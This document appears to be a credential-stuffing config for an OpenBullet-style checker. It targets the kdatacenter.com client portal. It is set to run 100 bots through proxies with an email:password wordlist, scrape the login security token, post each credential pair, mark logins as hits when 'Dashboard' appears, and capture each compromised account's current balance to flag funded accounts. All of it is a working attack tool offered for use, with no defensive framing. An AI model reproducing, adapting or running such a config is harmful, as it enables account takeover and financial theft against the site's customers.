[SETTINGS]
{
  "Name": "kdatacenter",
  "SuggestedBots": 100,
  "MaxCPM": 0,
  "LastModified": "2021-12-31T22:58:28.9300451+02:00",
  "AdditionalInfo": "",
  "RequiredPlugins": [],
  "Author": "@uzzzul",
  "Version": "1.1.2 [SB]",
  "SaveEmptyCaptures": false,
  "ContinueOnCustom": false,
  "SaveHitsToTextFile": false,
  "IgnoreResponseErrors": false,
  "MaxRedirects": 8,
  "NeedsProxies": true,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "BanProxyAfterGoodStatus": false,
  "BanLoopEvasionOverride": -1,
  "EncodeData": false,
  "AllowedWordlist1": "MailPass",
  "AllowedWordlist2": "MailPass",
  "DataRules": [],
  "CustomInputs": [],
  "CaptchaUrl": "",
  "IsBase64": false,
  "FilterList": [],
  "EvaluateMathOCR": false,
  "SecurityProtocol": 0,
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "QuitOnBanRetry": false,
  "AcceptInsecureCertificates": true,
  "DisableNotifications": false,
  "DisableImageLoading": false,
  "DefaultProfileDirectory": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": "",
  "Title": "kdatacenter",
  "IconPath": "Icon\\svbfile.ico",
  "LicenseSource": null,
  "Message": null,
  "MessageColor": "#FFFFFFFF",
  "HitInfoFormat": "[{hit.Type}][{hit.Proxy}] {hit.Data} - [{hit.CapturedString}]",
  "AuthorColor": "#FFFFB266",
  "WordlistColor": "#FFB5C2E1",
  "BotsColor": "#FFA8FFFF",
  "CustomInputColor": "#FFD6C7C7",
  "CPMColor": "#FFFFFFFF",
  "ProgressColor": "#FFAD93E3",
  "HitsColor": "#FF66FF66",
  "CustomColor": "#FFFFB266",
  "ToCheckColor": "#FF7FFFD4",
  "FailsColor": "#FFFF3333",
  "RetriesColor": "#FFFFFF99",
  "OcrRateColor": "#FF4698FD",
  "ProxiesColor": "#FFFFFFFF"
}

[SCRIPT]
#GE_TK REQUEST GET "https://www.kdatacenter.com/myportal/index.php?/clientarea/" 
  
  HEADER "Host: www.kdatacenter.com" 
  HEADER "Sec-Fetch-Dest: document" 
  HEADER "Sec-Fetch-Mode: navigate" 
  HEADER "Sec-Fetch-Site: none" 
  HEADER "Sec-Fetch-User: ?1" 
  HEADER "Sec-GPC: 1" 
  HEADER "Upgrade-Insecure-Requests: 1" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36" 

#sc PARSE "<SOURCE>" LR "name=\"security_token\" value=\"" "\"" -> VAR "sc" 

#LOGIN REQUEST POST "https://www.kdatacenter.com/myportal/index.php?/clientarea/" 
  CONTENT "username=<USER>&password=<PASS>&action=login&security_token=<sc>" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "Host: www.kdatacenter.com" 
  HEADER "Origin: https://www.kdatacenter.com" 
  HEADER "Referer: https://www.kdatacenter.com/myportal/index.php?/clientarea/" 
  HEADER "Sec-Fetch-Dest: document" 
  HEADER "Sec-Fetch-Mode: navigate" 
  HEADER "Sec-Fetch-Site: same-origin" 
  HEADER "Sec-Fetch-User: ?1" 
  HEADER "Sec-GPC: 1" 
  HEADER "Upgrade-Insecure-Requests: 1" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36" 

#HITS_FAILS KEYCHECK 
  KEYCHAIN Failure OR 
    KEY "E-mail and/or password is incorrect" 
  KEYCHAIN Success OR 
    KEY "Dashboard" 

#balance PARSE "<SOURCE>" LR "<p>Current Balance:</p>" "</span>" -> VAR "1" 

#balance FUNCTION Replace "<span>" "" "<1>" -> CAP "balance" 

#FREE KEYCHECK 
  KEYCHAIN Custom "FREE" OR 
    KEY "<balance>" EqualTo "$0.00 USD" 
  KEYCHAIN Success OR 
    KEY "<balance>" NotEqualTo "$0.00 USD" 

#author FUNCTION Constant "@uzzzul" -> CAP "configby" 

